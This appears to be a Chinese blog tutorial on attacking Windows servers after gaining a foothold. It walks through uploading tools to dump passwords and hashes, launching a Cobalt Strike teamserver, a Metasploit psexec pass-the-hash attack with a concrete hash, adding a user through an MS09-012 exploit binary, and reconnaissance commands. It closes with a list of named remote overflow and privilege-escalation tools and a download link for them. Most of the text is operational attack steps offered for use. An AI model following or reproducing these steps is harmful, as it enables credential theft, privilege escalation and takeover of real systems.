服务器密码获取实试(可以用cs代替)
1、上传cmd(我的是x32的操作系统)

2、执行setp c:\wmpub\cmd.exe设置终端路径(使用c:\wmpub路径下的cmd)

3、上传pr.exe和GetPass.exe(pr.exe提权;GetPass.exe读取密码)

4、启动cobaltstrike服务端
4.1、cd /mnt/cobaltstrike/
4.2、./teamserver 192.168.31.234 root

5、启动客户端,创建监听→主机上线

6、执行命令,读取名密码(shell pr "GetPass.exe" >>C:\wmpub\6.txt)

7、下载6.txt文件,查看密码

通过低版kail2.0完成hash远程连接
1、上传GetHashes.exe工具(读取hash值)

2、读取本地hash(pr.exe "GetHashes.exe $local")
注意:用户信息一般保存在C:\WINDOWS\system32\config\SAM文件中

3、打开msfconsole

4、配置连信息
4.1、use exploit/windows/smb/psexec
4.2、set RHOST 192.168.31.115
4.3、set SMBUser Administrator
4.4、set SMBPass 1E582C63EF02015AAAD3B435B51404EE:042BDA97096B7EFD74316D5237AED48F
4.5、运行(exploit)
4.6下图表示连接成功(需要kali2.0的版本,执行shell命令成功)

windows溢出提权
提权常用命令
whoami ——查看用户权限
systeminfo ——查看操作系统,补丁情况
ipconfig——查看当前服务器IP ipconfig /all
net user——查看当前用户情况
netstat ——查看当前网络连接情况 netstat –ano /netstat –an | find “ESTABLISHED”
tasklist ——查看当前进程情况 tasklist /svc
taskkill ——结束进程 taskkill -PID xx
netstart ——启动服务
net stop ——停止服务
1、上传cmd.exe

2、设置终端路(setp C:\wmpub\cmd_server2003.exe)

3、查询补丁安装情况(systeminfo)

4、上传debug.exe文件(带参数的新增用户文件)

5、执行命令debug.exe(会新增一个temp用户)

6、查看用户权限

常用提权方法
溢出漏洞提权、数据库提权、第三方软件提权
写出操作系统溢出提权常用工具及漏洞名称
常用提权工具:
1、KB952004 MS09-012---Pr.exe
2、KB956572 MS09-012---巴西烤肉
3、Wshelp 被动提权工具
其他提权:
1、sql2 ms-sql的远程溢出工具
2、thcsql ms-sql的远程溢出工具
3、ispc unicode漏洞的利用工具
4、lis5hack及idahack .printer漏洞的远程溢出工具
5、snake IIS Snake ida、idq的远程溢出工具
6、aspcode asp漏洞远程溢出工具
7、webdavx3 webdav漏洞远程溢出工具(isno)
8、webdav webdav漏洞溢出工具(yuange)
9、rpc_locator及rpc RPC LOCATOR漏洞的远程溢出工具
详细工具:
https://download.csdn.net/download/havefaith1/7465637
网友评论